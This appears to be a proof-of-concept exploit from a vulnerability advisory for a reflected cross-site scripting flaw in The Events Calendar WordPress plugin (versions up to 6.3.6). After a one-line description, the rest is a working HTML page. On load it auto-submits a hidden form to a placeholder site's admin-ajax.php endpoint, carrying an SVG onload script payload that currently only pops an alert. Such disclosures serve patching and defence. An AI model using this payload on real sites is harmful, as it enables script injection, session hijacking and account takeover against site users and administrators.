Description The plugin does not properly sanitize user-submitted content when rendering some views via AJAX.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>The Events Calendar <= 6.3.6 - Reflected XSS</title>
</head>
<body onload="document.getElementById('autoSubmitForm').submit();">
<form id="autoSubmitForm" action="http://vulnerablesite.tld/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tribe_events_views_v2_fallback">
<input type="hidden" name="view" value="reflector">
<input type="hidden" name="view_data[lala]" value="<svg onload=alert(document.domain);></svg>">
</form>
</body>
</html>